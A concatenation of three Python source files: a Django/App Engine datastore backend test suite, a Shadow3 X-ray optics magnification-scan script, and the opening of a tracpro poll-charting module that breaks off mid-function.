self.u1 = TestUser.objects.create(username="A", email="test@example.com", last_login=datetime.datetime.now().date(), id=1)
self.u2 = TestUser.objects.create(username="B", email="test@example.com", last_login=datetime.datetime.now().date(), id=2)
self.u3 = TestUser.objects.create(username="C", email="test2@example.com", last_login=datetime.datetime.now().date(), id=3)
self.u4 = TestUser.objects.create(username="D", email="test3@example.com", last_login=datetime.datetime.now().date(), id=4)
self.u5 = TestUser.objects.create(username="E", email="test3@example.com", last_login=datetime.datetime.now().date(), id=5)
self.apple = TestFruit.objects.create(name="apple", color="red")
self.banana = TestFruit.objects.create(name="banana", color="yellow")
def test_querying_by_date(self):
instance1 = ModelWithDates.objects.create(start=datetime.date(2014, 1, 1), end=datetime.date(2014, 1, 20))
instance2 = ModelWithDates.objects.create(start=datetime.date(2014, 2, 1), end=datetime.date(2014, 2, 20))
self.assertEqual(instance1, ModelWithDates.objects.get(start__lt=datetime.date(2014, 1, 2)))
self.assertEqual(2, ModelWithDates.objects.filter(start__lt=datetime.date(2015, 1, 1)).count())
self.assertEqual(instance2, ModelWithDates.objects.get(start__gt=datetime.date(2014, 1, 2)))
self.assertEqual(instance2, ModelWithDates.objects.get(start__gte=datetime.date(2014, 2, 1)))
def test_double_starts_with(self):
qs = TestUser.objects.filter(username__startswith='Hello') | TestUser.objects.filter(username__startswith='Goodbye')
self.assertEqual(0, qs.count())
TestUser.objects.create(username="Hello")
self.assertEqual(1, qs.count())
TestUser.objects.create(username="Goodbye")
self.assertEqual(2, qs.count())
TestUser.objects.create(username="Hello and Goodbye")
self.assertEqual(3, qs.count())
def test_impossible_starts_with(self):
TestUser.objects.create(username="Hello")
TestUser.objects.create(username="Goodbye")
TestUser.objects.create(username="Hello and Goodbye")
qs = TestUser.objects.filter(username__startswith='Hello') & TestUser.objects.filter(username__startswith='Goodbye')
self.assertEqual(0, qs.count())
def test_datetime_contains(self):
"""
Django allows for __contains on datetime field, so that you can search for a specific
date. This is probably just because SQL allows querying it on a string, and contains just
turns into a like query. This test just makes sure we behave the same
"""
instance = DateTimeModel.objects.create() # Create a DateTimeModel, it has auto_now stuff
# Make sure that if we query a datetime on a date it is properly returned
self.assertItemsEqual([instance], DateTimeModel.objects.filter(datetime_field__contains=instance.datetime_field.date()))
self.assertItemsEqual([instance], DateTimeModel.objects.filter(date_field__contains=instance.date_field.year))
def test_combinations_of_special_indexes(self):
qs = TestUser.objects.filter(username__iexact='Hello') | TestUser.objects.filter(username__contains='ood')
self.assertEqual(0, qs.count())
TestUser.objects.create(username="Hello")
self.assertEqual(1, qs.count())
TestUser.objects.create(username="Goodbye")
self.assertEqual(2, qs.count())
TestUser.objects.create(username="Hello and Goodbye")
self.assertEqual(3, qs.count())
def test_multi_table_inheritance(self):
parent = MultiTableParent.objects.create(parent_field="parent1")
child1 = MultiTableChildOne.objects.create(parent_field="child1", child_one_field="child1")
child2 = MultiTableChildTwo.objects.create(parent_field="child2", child_two_field="child2")
self.assertEqual(3, MultiTableParent.objects.count())
self.assertItemsEqual([parent.pk, child1.pk, child2.pk],
list(MultiTableParent.objects.values_list('pk', flat=True)))
self.assertEqual(1, MultiTableChildOne.objects.count())
self.assertEqual(child1, MultiTableChildOne.objects.get())
self.assertEqual(1, MultiTableChildTwo.objects.count())
self.assertEqual(child2, MultiTableChildTwo.objects.get())
self.assertEqual(child2, MultiTableChildTwo.objects.get(pk=child2.pk))
self.assertTrue(MultiTableParent.objects.filter(pk=child2.pk).exists())
def test_anding_pks(self):
results = TestUser.objects.filter(id__exact=self.u1.pk).filter(id__exact=self.u2.pk)
self.assertEqual(list(results), [])
def test_unusual_queries(self):
results = TestFruit.objects.filter(name__in=["apple", "orange"])
self.assertEqual(1, len(results))
self.assertItemsEqual(["apple"], [x.name for x in results])
results = TestFruit.objects.filter(name__in=["apple", "banana"])
self.assertEqual(2, len(results))
self.assertItemsEqual(["apple", "banana"], [x.name for x in results])
results = TestFruit.objects.filter(name__in=["apple", "banana"]).values_list('pk', 'color')
self.assertEqual(2, len(results))
self.assertItemsEqual([(self.apple.pk, self.apple.color), (self.banana.pk, self.banana.color)], results)
results = TestUser.objects.all()
self.assertEqual(5, len(results))
results = TestUser.objects.filter(username__in=["A", "B"])
self.assertEqual(2, len(results))
self.assertItemsEqual(["A", "B"], [x.username for x in results])
results = TestUser.objects.filter(username__in=["A", "B"]).exclude(username="A")
self.assertEqual(1, len(results), results)
self.assertItemsEqual(["B"], [x.username for x in results])
results = TestUser.objects.filter(username__lt="E")
self.assertEqual(4, len(results))
self.assertItemsEqual(["A", "B", "C", "D"], [x.username for x in results])
results = TestUser.objects.filter(username__lte="E")
self.assertEqual(5, len(results))
#Double exclude on different properties not supported
with self.assertRaises(NotSupportedError):
#FIXME: This should raise a NotSupportedError, but at the moment it's thrown too late in
#the process and so Django wraps it as a DataError
list(TestUser.objects.exclude(username="E").exclude(email="A"))
results = list(TestUser.objects.exclude(username="E").exclude(username="A"))
self.assertItemsEqual(["B", "C", "D"], [x.username for x in results ])
results = TestUser.objects.filter(username="A", email="test@example.com")
self.assertEqual(1, len(results))
results = TestUser.objects.filter(username__in=["A", "B"]).filter(username__in=["A", "B"])
self.assertEqual(2, len(results))
self.assertItemsEqual(["A", "B"], [x.username for x in results])
results = TestUser.objects.filter(username__in=["A", "B"]).filter(username__in=["A"])
self.assertEqual(1, len(results))
self.assertItemsEqual(["A"], [x.username for x in results])
results = TestUser.objects.filter(pk__in=[self.u1.pk, self.u2.pk]).filter(username__in=["A"])
self.assertEqual(1, len(results))
self.assertItemsEqual(["A"], [x.username for x in results])
results = TestUser.objects.filter(username__in=["A"]).filter(pk__in=[self.u1.pk, self.u2.pk])
self.assertEqual(1, len(results))
self.assertItemsEqual(["A"], [x.username for x in results])
results = list(TestUser.objects.all().exclude(username__in=["A"]))
self.assertItemsEqual(["B", "C", "D", "E"], [x.username for x in results ])
results = list(TestFruit.objects.filter(name='apple', color__in=[]))
self.assertItemsEqual([], results)
results = list(TestUser.objects.all().exclude(username__in=[]))
self.assertEqual(5, len(results))
self.assertItemsEqual(["A", "B", "C", "D", "E"], [x.username for x in results ])
results = list(TestUser.objects.all().exclude(username__in=[]).filter(username__in=["A", "B"]))
self.assertEqual(2, len(results))
self.assertItemsEqual(["A", "B"], [x.username for x in results])
results = list(TestUser.objects.all().filter(username__in=["A", "B"]).exclude(username__in=[]))
self.assertEqual(2, len(results))
self.assertItemsEqual(["A", "B"], [x.username for x in results])
def test_empty_string_key(self):
# Creating
with self.assertRaises(IntegrityError):
TestFruit.objects.create(name='')
# Getting
with self.assertRaises(TestFruit.DoesNotExist):
TestFruit.objects.get(name='')
# Filtering
results = list(TestFruit.objects.filter(name='').order_by("name"))
self.assertItemsEqual([], results)
# Combined filtering
results = list(TestFruit.objects.filter(name='', color='red').order_by("name"))
self.assertItemsEqual([], results)
# IN query
results = list(TestFruit.objects.filter(name__in=['', 'apple']))
self.assertItemsEqual([self.apple], results)
def test_or_queryset(self):
"""
This constructs an OR query, this is currently broken in the parse_where_and_check_projection
function. WE MUST FIX THIS!
"""
q1 = TestUser.objects.filter(username="A")
q2 = TestUser.objects.filter(username="B")
self.assertItemsEqual([self.u1, self.u2], list(q1 | q2))
def test_or_q_objects(self):
""" Test use of Q objects in filters. """
query = TestUser.objects.filter(Q(username="A") | Q(username="B"))
self.assertItemsEqual([self.u1, self.u2], list(query))
def test_extra_select(self):
results = TestUser.objects.filter(username='A').extra(select={'is_a': "username = 'A'"})
self.assertEqual(1, len(results))
self.assertItemsEqual([True], [x.is_a for x in results])
results = TestUser.objects.all().exclude(username='A').extra(select={'is_a': "username = 'A'"})
self.assertEqual(4, len(results))
self.assertEqual(not any([x.is_a for x in results]), True)
# Up for debate
# results = User.objects.all().extra(select={'truthy': 'TRUE'})
# self.assertEqual(all([x.truthy for x in results]), True)
results = TestUser.objects.all().extra(select={'truthy': True})
self.assertEqual(all([x.truthy for x in results]), True)
def test_counts(self):
self.assertEqual(5, TestUser.objects.count())
self.assertEqual(2, TestUser.objects.filter(email="test3@example.com").count())
self.assertEqual(3, TestUser.objects.exclude(email="test3@example.com").count())
self.assertEqual(1, TestUser.objects.filter(username="A").exclude(email="test3@example.com").count())
self.assertEqual(3, TestUser.objects.exclude(username="E").exclude(username="A").count())
def test_deletion(self):
count = TestUser.objects.count()
self.assertTrue(count)
TestUser.objects.filter(username="A").delete()
self.assertEqual(count - 1, TestUser.objects.count())
TestUser.objects.filter(username="B").exclude(username="B").delete() #Should do nothing
self.assertEqual(count - 1, TestUser.objects.count())
TestUser.objects.all().delete()
count = TestUser.objects.count()
self.assertFalse(count)
def test_insert_with_existing_key(self):
user = TestUser.objects.create(id=999, username="test1", last_login=datetime.datetime.now().date())
self.assertEqual(999, user.pk)
with self.assertRaises(IntegrityError):
TestUser.objects.create(id=999, username="test2", last_login=datetime.datetime.now().date())
def test_included_pks(self):
ids = [ TestUser.objects.get(username="B").pk, TestUser.objects.get(username="A").pk ]
results = TestUser.objects.filter(pk__in=ids).order_by("username")
self.assertEqual(results[0], self.u1)
self.assertEqual(results[1], self.u2)
def test_select_related(self):
""" select_related should be a no-op... for now """
user = TestUser.objects.get(username="A")
Permission.objects.create(user=user, perm="test_perm")
select_related = [ (p.perm, p.user.username) for p in user.permission_set.select_related() ]
self.assertEqual(user.username, select_related[0][1])
def test_cross_selects(self):
user = TestUser.objects.get(username="A")
Permission.objects.create(user=user, perm="test_perm")
with self.assertRaises(NotSupportedError):
perms = list(Permission.objects.all().values_list("user__username", "perm"))
self.assertEqual("A", perms[0][0])
def test_values_list_on_pk_does_keys_only_query(self):
from google.appengine.api.datastore import Query
def replacement_init(*args, **kwargs):
replacement_init.called_args = args
replacement_init.called_kwargs = kwargs
original_init(*args, **kwargs)
replacement_init.called_args = None
replacement_init.called_kwargs = None
try:
original_init = Query.__init__
Query.__init__ = replacement_init
list(TestUser.objects.all().values_list('pk', flat=True))
finally:
Query.__init__ = original_init
self.assertTrue(replacement_init.called_kwargs.get('keys_only'))
self.assertEqual(5, len(TestUser.objects.all().values_list('pk')))
def test_iexact(self):
user = TestUser.objects.get(username__iexact="a")
self.assertEqual("A", user.username)
add_special_index(IntegerModel, "integer_field", "iexact")
IntegerModel.objects.create(integer_field=1000)
integer_model = IntegerModel.objects.get(integer_field__iexact=str(1000))
self.assertEqual(integer_model.integer_field, 1000)
user = TestUser.objects.get(id__iexact=str(self.u1.id))
self.assertEqual("A", user.username)
def test_ordering(self):
users = TestUser.objects.all().order_by("username")
self.assertEqual(["A", "B", "C", "D", "E"], [x.username for x in users])
users = TestUser.objects.all().order_by("-username")
self.assertEqual(["A", "B", "C", "D", "E"][::-1], [x.username for x in users])
with self.assertRaises(FieldError):
users = list(TestUser.objects.order_by("bananas"))
users = TestUser.objects.filter(id__in=[self.u2.id, self.u3.id, self.u4.id]).order_by('id')
self.assertEqual(["B", "C", "D"], [x.username for x in users])
users = TestUser.objects.filter(id__in=[self.u2.id, self.u3.id, self.u4.id]).order_by('-id')
self.assertEqual(["D", "C", "B"], [x.username for x in users])
users = TestUser.objects.filter(id__in=[self.u1.id, self.u5.id, self.u3.id]).order_by('id')
self.assertEqual(["A", "C", "E"], [x.username for x in users])
users = TestUser.objects.filter(id__in=[self.u4.id, self.u5.id, self.u3.id, self.u1.id]).order_by('-id')
self.assertEqual(["E", "D", "C", "A"], [x.username for x in users])
def test_dates_query(self):
z_user = TestUser.objects.create(username="Z", email="z@example.com")
z_user.last_login = datetime.date(2013, 4, 5)
z_user.save()
last_a_login = TestUser.objects.get(username="A").last_login
dates = TestUser.objects.dates('last_login', 'year')
self.assertItemsEqual(
[datetime.date(2013, 1, 1), datetime.date(last_a_login.year, 1, 1)],
dates
)
dates = TestUser.objects.dates('last_login', 'month')
self.assertItemsEqual(
[datetime.date(2013, 4, 1), datetime.date(last_a_login.year, last_a_login.month, 1)],
dates
)
dates = TestUser.objects.dates('last_login', 'day')
self.assertEqual(
[datetime.date(2013, 4, 5), last_a_login],
list(dates)
)
dates = TestUser.objects.dates('last_login', 'day', order='DESC')
self.assertEqual(
[last_a_login, datetime.date(2013, 4, 5)],
list(dates)
)
def test_in_query(self):
""" Test that the __in filter works, and that it cannot be used with more than 30 values,
unless it's used on the PK field.
"""
# Check that a basic __in query works
results = list(TestUser.objects.filter(username__in=['A', 'B']))
self.assertItemsEqual(results, [self.u1, self.u2])
# Check that it also works on PKs
results = list(TestUser.objects.filter(pk__in=[self.u1.pk, self.u2.pk]))
self.assertItemsEqual(results, [self.u1, self.u2])
# Check that using more than 30 items in an __in query not on the pk causes death
query = TestUser.objects.filter(username__in=list([x for x in letters[:31]]))
# This currently raises an error from App Engine, should we raise our own?
self.assertRaises(Exception, list, query)
# Check that it's ok with PKs though
query = TestUser.objects.filter(pk__in=list(xrange(1, 32)))
list(query)
# Check that it's ok joining filters with pks
results = list(TestUser.objects.filter(
pk__in=[self.u1.pk, self.u2.pk, self.u3.pk]).filter(pk__in=[self.u1.pk, self.u2.pk]))
self.assertItemsEqual(results, [self.u1, self.u2])
def test_self_relations(self):
obj = SelfRelatedModel.objects.create()
obj2 = SelfRelatedModel.objects.create(related=obj)
self.assertEqual(list(obj.selfrelatedmodel_set.all()), [obj2])
def test_special_indexes_for_empty_fields(self):
obj = TestFruit.objects.create(name='pear')
indexes = ['icontains', 'contains', 'iexact', 'iendswith', 'endswith', 'istartswith', 'startswith']
for index in indexes:
add_special_index(TestFruit, 'color', index)
obj.save()
def test_special_indexes_for_unusually_long_values(self):
obj = TestFruit.objects.create(name='pear', color='1234567890-=!@#$%^&*()_+qQWERwertyuiopasdfghjklzxcvbnm')
indexes = ['icontains', 'contains', 'iexact', 'iendswith', 'endswith', 'istartswith', 'startswith']
for index in indexes:
add_special_index(TestFruit, 'color', index)
obj.save()
qry = TestFruit.objects.filter(color__contains='1234567890-=!@#$%^&*()_+qQWERwertyuiopasdfghjklzxcvbnm')
self.assertEqual(len(list(qry)), 1)
qry = TestFruit.objects.filter(color__contains='890-=!@#$')
self.assertEqual(len(list(qry)), 1)
qry = TestFruit.objects.filter(color__contains='1234567890-=!@#$%^&*()_+qQWERwertyui')
self.assertEqual(len(list(qry)), 1)
qry = TestFruit.objects.filter(color__contains='8901')
self.assertEqual(len(list(qry)), 0)
qry = TestFruit.objects.filter(color__icontains='1234567890-=!@#$%^&*()_+qQWERWERTYuiopasdfghjklzxcvbnm')
self.assertEqual(len(list(qry)), 1)
qry = TestFruit.objects.filter(color__icontains='890-=!@#$')
self.assertEqual(len(list(qry)), 1)
qry = TestFruit.objects.filter(color__icontains='1234567890-=!@#$%^&*()_+qQWERwertyuI')
self.assertEqual(len(list(qry)), 1)
qry = TestFruit.objects.filter(color__icontains='8901')
self.assertEqual(len(list(qry)), 0)
class BlobstoreFileUploadHandlerTest(TestCase):
boundary = "===============7417945581544019063=="
def setUp(self):
super(BlobstoreFileUploadHandlerTest, self).setUp()
self.request = RequestFactory().get('/')
self.request.META = {
'wsgi.input': self._create_wsgi_input(),
'content-type': 'message/external-body; blob-key="PLOF0qOie14jzHWJXEa9HA=="; access-type="X-AppEngine-BlobKey"'
}
self.uploader = BlobstoreFileUploadHandler(self.request)
def _create_wsgi_input(self):
return StringIO('--===============7417945581544019063==\r\nContent-Type:'
' text/plain\r\nContent-Disposition: form-data;'
' name="field-nationality"\r\n\r\nAS\r\n'
'--===============7417945581544019063==\r\nContent-Type:'
' message/external-body; blob-key="PLOF0qOie14jzHWJXEa9HA==";'
' access-type="X-AppEngine-BlobKey"\r\nContent-Disposition:'
' form-data; name="field-file";'
' filename="Scan.tiff"\r\n\r\nContent-Type: image/tiff'
'\r\nContent-Length: 19837164\r\nContent-MD5:'
' YjI1M2Q5NjM5YzdlMzUxYjMyMjA0ZTIxZjAyNzdiM2Q=\r\ncontent-disposition:'
' form-data; name="field-file";'
' filename="Scan.tiff"\r\nX-AppEngine-Upload-Creation: 2014-03-07'
' 14:48:03.246607\r\n\r\n\r\n'
'--===============7417945581544019063==\r\nContent-Type:'
' text/plain\r\nContent-Disposition: form-data;'
' name="field-number"\r\n\r\n6\r\n'
'--===============7417945581544019063==\r\nContent-Type:'
' text/plain\r\nContent-Disposition: form-data;'
' name="field-salutation"\r\n\r\nmrs\r\n'
'--===============7417945581544019063==--')
def test_non_existing_files_do_not_get_created(self):
file_field_name = 'field-file'
length = len(self._create_wsgi_input().read())
self.uploader.handle_raw_input(self.request.META['wsgi.input'], self.request.META, length, self.boundary, "utf-8")
self.assertRaises(StopFutureHandlers, self.uploader.new_file, file_field_name, 'file_name', None, None)
self.assertRaises(EntityNotFoundError, self.uploader.file_complete, None)
def test_blob_key_creation(self):
file_field_name = 'field-file'
length = len(self._create_wsgi_input().read())
self.uploader.handle_raw_input(self.request.META['wsgi.input'], self.request.META, length, self.boundary, "utf-8")
self.assertRaises(
StopFutureHandlers,
self.uploader.new_file, file_field_name, 'file_name', None, None
)
self.assertIsNotNone(self.uploader.blobkey)
def test_blobstore_upload_url_templatetag(self):
template = """{% load storage %}{% blobstore_upload_url '/something/' %}"""
response = Template(template).render(Context({}))
self.assertTrue(response.startswith("http://localhost:8080/_ah/upload/"))
class DatastorePaginatorTest(TestCase):
def setUp(self):
super(DatastorePaginatorTest, self).setUp()
for i in range(15):
PaginatorModel.objects.create(foo=i)
def test_basic_usage(self):
def qs():
return PaginatorModel.objects.all().order_by('foo')
p1 = paginator.DatastorePaginator(qs(), 5).page(1)
self.assertFalse(p1.has_previous())
self.assertTrue(p1.has_next())
self.assertEqual(p1.start_index(), 1)
self.assertEqual(p1.end_index(), 5)
self.assertEqual(p1.next_page_number(), 2)
self.assertEqual([x.foo for x in p1], [0, 1, 2, 3, 4])
p2 = paginator.DatastorePaginator(qs(), 5).page(2)
self.assertTrue(p2.has_previous())
self.assertTrue(p2.has_next())
self.assertEqual(p2.start_index(), 6)
self.assertEqual(p2.end_index(), 10)
self.assertEqual(p2.previous_page_number(), 1)
self.assertEqual(p2.next_page_number(), 3)
self.assertEqual([x.foo for x in p2], [5, 6, 7, 8, 9])
p3 = paginator.DatastorePaginator(qs(), 5).page(3)
self.assertTrue(p3.has_previous())
self.assertFalse(p3.has_next())
self.assertEqual(p3.start_index(), 11)
self.assertEqual(p3.end_index(), 15)
self.assertEqual(p3.previous_page_number(), 2)
self.assertEqual([x.foo for x in p3], [10, 11, 12, 13, 14])
def test_empty(self):
qs = PaginatorModel.objects.none()
p1 = paginator.DatastorePaginator(qs, 5).page(1)
self.assertFalse(p1.has_previous())
self.assertFalse(p1.has_next())
self.assertEqual(p1.start_index(), 0)
self.assertEqual(p1.end_index(), 0)
self.assertEqual([x for x in p1], [])
class TestSpecialIndexers(TestCase):
def setUp(self):
super(TestSpecialIndexers, self).setUp()
self.names = [
'Ola', 'Adam', 'Luke', 'rob', 'Daniel', 'Ela', 'Olga', 'olek',
'ola', 'Olaaa', 'OlaaA', 'Ola + Ola', '-Test-', '-test-'
]
for name in self.names:
SpecialIndexesModel.objects.create(name=name)
self.lists = [
self.names,
['Name', 'name', 'name + name'],
['-Tesst-'],
['-test-']
]
for sample_list in self.lists:
SpecialIndexesModel.objects.create(sample_list=sample_list)
self.qry = SpecialIndexesModel.objects.all()
def test_iexact_lookup(self):
for name in self.names:
qry = self.qry.filter(name__iexact=name)
self.assertEqual(len(qry), len([x for x in self.names if x.lower() == name.lower()]))
def test_contains_lookup_and_icontains_lookup(self):
tests = self.names + ['o', 'O', 'la']
for name in tests:
qry = self.qry.filter(name__contains=name)
self.assertEqual(len(qry), len([x for x in self.names if name in x]))
qry = self.qry.filter(name__icontains=name)
self.assertEqual(len(qry), len([x for x in self.names if name.lower() in x.lower()]))
def test_endswith_lookup_and_iendswith_lookup(self):
tests = self.names + ['a', 'A', 'aa']
for name in tests:
qry = self.qry.filter(name__endswith=name)
self.assertEqual(len(qry), len([x for x in self.names if x.endswith(name)]))
qry = self.qry.filter(name__iendswith=name)
self.assertEqual(len(qry), len([x for x in self.names if x.lower().endswith(name.lower())]))
def test_startswith_lookup_and_istartswith_lookup(self):
tests = self.names + ['O', 'o', 'ola']
for name in tests:
qry = self.qry.filter(name__startswith=name)
self.assertEqual(len(qry), len([x for x in self.names if x.startswith(name)]))
qry = self.qry.filter(name__istartswith=name)
self.assertEqual(len(qry), len([x for x in self.names if x.lower().startswith(name.lower())]))
def test_regex_lookup_and_iregex_lookup(self):
tests = ['([A-Z])\w+', '([A-Z])\w+\s[+]\s([A-Z])\w+', '\-Test\-']
for pattern in tests:
qry = self.qry.filter(name__regex=pattern)
self.assertEqual(len(qry), len([x for x in self.names if re.search(pattern, x)]))
qry = self.qry.filter(name__iregex=pattern)
self.assertEqual(len(qry), len([x for x in self.names if re.search(pattern, x, flags=re.I)]))
# Check that the same works for ListField and SetField too
qry = self.qry.filter(sample_list__regex=pattern)
expected = [sample_list for sample_list in self.lists if any([bool(re.search(pattern, x)) for x in sample_list])]
self.assertEqual(len(qry), len(expected))
qry = self.qry.filter(sample_list__iregex=pattern)
expected = [sample_list for sample_list in self.lists if any([bool(re.search(pattern, x, flags=re.I)) for x in sample_list])]
self.assertEqual(len(qry), len(expected))
def deferred_func():
pass
class TestHelperTests(TestCase):
def test_inconsistent_db(self):
with inconsistent_db():
fruit = TestFruit.objects.create(name="banana")
self.assertEqual(0, TestFruit.objects.count()) # Inconsistent query
self.assertEqual(1, TestFruit.objects.filter(pk=fruit.pk).count()) #Consistent query
def test_processing_tasks(self):
from google.appengine.api import apiproxy_stub_map
stub = apiproxy_stub_map.apiproxy.GetStub("taskqueue")
stub._queues[None]._ConstructQueue("another") # Add a test queue
stub._queues[None]._queue_yaml_parser = None # Make it so that the taskqueue stub doesn't reload from YAML
self.assertNumTasksEquals(0) #No tasks
deferred.defer(deferred_func)
self.assertNumTasksEquals(1, queue_name='default')
deferred.defer(deferred_func, _queue='another')
self.assertNumTasksEquals(1, queue_name='another')
taskqueue.add(url='/')
self.assertNumTasksEquals(2, queue_name='default')
self.process_task_queues()
self.assertNumTasksEquals(0) #No tasks
| |
#
#
# Shadow3 python script to scan a variable
#
#
# It uses the currently defined Shadow system (files start.00...start.03)
#
# It scans a list of variables, e.g., the distances T_SOURCE and T_IMAGE of
# the first and second o.e., respectively.
# It also sets the o.e.2 radius accordingly.
#
# Output: a file ex18b.spec
#
#
# Author: Manuel Sanchew del Rio
# ESRF (c) 2013-2015
#
# Modifications:
# srio@esrf.eu 20140108 Adapted for python3
#
#
# import block
#
import numpy
import Shadow
import copy
do_intermediate_plots = 0
horizontal_divergence_in_mrad = 5.0
#
# initialize shadow3 source (oe0) and beam
#
beam = Shadow.Beam()
oe0 = Shadow.Source()
oe1 = Shadow.OE()
oe2 = Shadow.OE()
oe0.BENER = 6.03999996
oe0.EPSI_X = 3.89999997e-07
oe0.EPSI_Z = 3.89999988e-09
oe0.FDISTR = 4
oe0.FSOURCE_DEPTH = 4
oe0.F_COLOR = 3
oe0.F_PHOT = 0
oe0.HDIV1 = 0.05*1e-3*horizontal_divergence_in_mrad
oe0.HDIV2 = 0.05*1e-3*horizontal_divergence_in_mrad
oe0.ISTAR1 = 567656675
oe0.NCOL = 0
oe0.NPOINT = 25000
oe0.N_COLOR = 0
oe0.PH1 = 19970.0
oe0.PH2 = 20030.0
oe0.POL_DEG = 0.0
oe0.R_ALADDIN = 2517.72003
oe0.R_MAGNET = 25.1772003
oe0.SIGDIX = 0.0
oe0.SIGDIZ = 0.0
oe0.SIGMAX = 0.0395000018
oe0.SIGMAY = 0.0
oe0.SIGMAZ = 0.00368999992
oe0.VDIV1 = 1.0
oe0.VDIV2 = 1.0
oe0.WXSOU = 0.0
oe0.WYSOU = 0.0
oe0.WZSOU = 0.0
oe1.FILE_REFL = b'si5_55.111'
oe1.F_CENTRAL = 1
oe1.F_CRYSTAL = 1
oe1.PHOT_CENT = 20000.0
oe1.R_LAMBDA = 5000.0
oe1.T_IMAGE = 0.0
oe1.T_INCIDENCE = 45.0
oe1.T_REFLECTION = 45.0
oe1.T_SOURCE = 3000.0
oe2.ALPHA = 180.0
oe2.CIL_ANG = 90.0
oe2.FCYL = 1
oe2.FILE_REFL = b'si5_55.111'
oe2.FMIRR = 1
oe2.F_CENTRAL = 1
oe2.F_CRYSTAL = 1
oe2.F_EXT = 1
oe2.PHOT_CENT = 20000.0
oe2.RMIRR = 148.298614
oe2.R_LAMBDA = 5000.0
oe2.T_IMAGE = 1000.0
oe2.T_INCIDENCE = 45.0
oe2.T_REFLECTION = 45.0
oe2.T_SOURCE = 0.0
#
# >>>>>>>>>>> inputs <<<<<<<<<<<<<
#
#
# flags
#
write = 0 # 0=No 1=Yes (write shadow binary files)
#
# scanning magnification M:
#
npts = 51
scan = numpy.linspace(0.1,1.0,npts) # from, to, npoints
#
# >>>>>>>>>>> calculations <<<<<<<<<<<<<
#
#
# define array to store results
#
nout = 8 # number of variables to store
out = numpy.zeros( (nout,scan.size) ) # creates the array to store results
#
# open output file
#
f = open('ex18b.spec', 'wb')
header="#F ex18b.py\n"
f.write( header.encode('utf-8') )
#
# run source with horizontal divergence: HDIV1+HDIV2duplicate
#
oe0.HDIV1 = 5e-3/2
oe0.HDIV2 = 5e-3/2
beam.genSource(oe0)
if write:
beam.write("begin.dat")
#
# start loop on scanned variable
#
for i in range(scan.size):
print("\n>>>>>>>>>> tracing item %d of %d. \n"%(i+1,scan.size))
oe1i = oe1.duplicate()
oe2i = oe2.duplicate()
pp = 3000.0
qq = pp*scan[i]
theta = (90.0e0 - 84.32614)*numpy.pi/180e0
rsag=2.0e0*numpy.sin(theta)/(1.0e0/pp+1.0e0/qq)
oe1i.T_SOURCE = pp
oe2i.T_IMAGE = qq
oe2i.RMIRR = rsag
if write:
oe1i.FWRITE=0 # write(0) or not(3) binary files
oe2i.FWRITE=0 # write(0) or not(3) binary files
oe1i.write("start.01")
oe2i.write("start.02")
else:
oe1i.FWRITE=3 # write(0) or not(3) binary files
oe2i.FWRITE=3 # write(0) or not(3) binary files
beami = None
beami = beam.duplicate()
# run trace
beami.traceOE(oe1i,1)
beami.traceOE(oe2i,2)
if write:
oe1i.write("end.01")
oe2i.write("end.02")
# score results
g1 = beami.histo2(1,3,nolost=1,nbins=100)
g2 = beami.histo1(11,nolost=1,nbins=31,ref=23)
#plots
if do_intermediate_plots:
Shadow.ShadowTools.plotxy(beami,1,3,nolost=1,nbins=100)
# store scored results
out[0,i] = scan[i]
out[1,i] = pp
out[2,i] = qq
out[3,i] = rsag
#if g1 != None:
# fw1 = numpy.array([g1.fwhmx,g1.fwhmy])
out[4,i] = g1['fwhm_h']*1e4 # in um
out[5,i] = g1['fwhm_v']*1e4
#
# if g2 != None:
out[6,i] = g2['fwhm']
out[7,i] = beami.intensity(nolost=1)
labels="#L Magnification p [cm] q [cm] Rsag [cm] "+ \
"fwhm_h [um] fwhm_v [um] DE [eV] Intensity [a.u.]"
#
# >>>>>>>>>>>> outputs <<<<<<<<<<<<<<<<
#
#write spec formatted file
tmp = range(out.shape[0])
tmp = (str( tmp ).strip('[]')).split()
header="\n#S 1 Magnification\n#N "+ \
str(out.shape[0])+"\n"+labels+"\n"
f.write(header.encode('utf-8') )
for i in range(out.shape[1]):
tmps = ("%20.11e "*out.shape[0]+"\n") % tuple( out[:,i].tolist())
f.write( tmps.encode('utf-8') )
print( ("%20.11e "*out.shape[0]+"\n") % tuple( out[:,i].tolist()) )
f.close()
print ("File written to disk: ex18b.spec")
#
#plot results with matplotlib
#
from matplotlib import pylab as plt
plt.plot(out[0,:],out[7,:])
plt.xlabel('Magnification factor')
plt.ylabel('Intensity')
plt.show()
| |
from __future__ import absolute_import, unicode_literals
from django.core.urlresolvers import reverse
from django.db.models.functions import Lower
from django.utils.http import urlencode
from tracpro.charts.formatters import format_series, format_x_axis
from tracpro.groups.models import Region
from .models import Answer, Question
from . import utils
def _url(name, args=None, kwargs=None, params=None):
url = reverse(name, args=args, kwargs=kwargs)
if params:
url = '{}?{}'.format(url, urlencode(params))
return url
def single_pollrun(pollrun, responses, question):
"""Chart the data for one question from a single pollrun.
Assumes responses are already filtered for the desired pollrun/date,
and includes all valid answers for the given question and responses.
Will be a word cloud for open-ended questions, a bar chart with autocreated
categories for numeric questions, and a bar chart of categories for everything else.
Returns a tuple (chart_type, chart_data, summary_table), where:
chart_type = None|'open-ended'|'bar'
chart_data = {'categories': list of category names, 'data': list of counts} for all but open-ended,
or list of {'text': 'xxx', 'weight': NNN} dictionaries for open-ended}
or empty list if there were no answers.
summary_table = if numeric:
[('Mean', value), ('Standard deviation', value), ('Response rate average (%)', value)]
else (no answers or non-numeric) None.
"""
chart_type = None
chart_data = []
summary_table = None
answers = Answer.objects.filter(response__in=responses, question=question)
if answers:
if question.question_type == Question.TYPE_OPEN:
chart_type = 'open-ended'
chart_data = word_cloud_data(answers)
else:
chart_type = 'bar'
if question.question_type == Question.TYPE_NUMERIC:
chart_data = single_pollrun_auto_categorize(answers)
else:
chart_data = single_pollrun_multiple_choice(answers, pollrun)
_, answer_avgs, answer_stdevs, response_rates = utils.summarize_by_pollrun(
answers, responses)
summary_table = [
('Mean', answer_avgs.get(pollrun.pk, 0)),
('Standard deviation', answer_stdevs.get(pollrun.pk, 0)),
('Response rate average (%)', response_rates.get(pollrun.pk, 0)),
]
return chart_type, chart_data, summary_table
def single_pollrun_auto_categorize(answers):
return answers.autocategorize()
def single_pollrun_multiple_choice(answers, pollrun):
data = []
categories = []
for category, pollrun_counts in answers.category_counts_by_pollrun():
categories.append(category)
count = pollrun_counts.get(pollrun.pk, 0)
data.append(count)
return {
'categories': categories,
'data': data,
}
def multiple_pollruns(pollruns, responses, question, split_regions, contact_filters):
chart_type = None
chart_data = None
summary_table = None
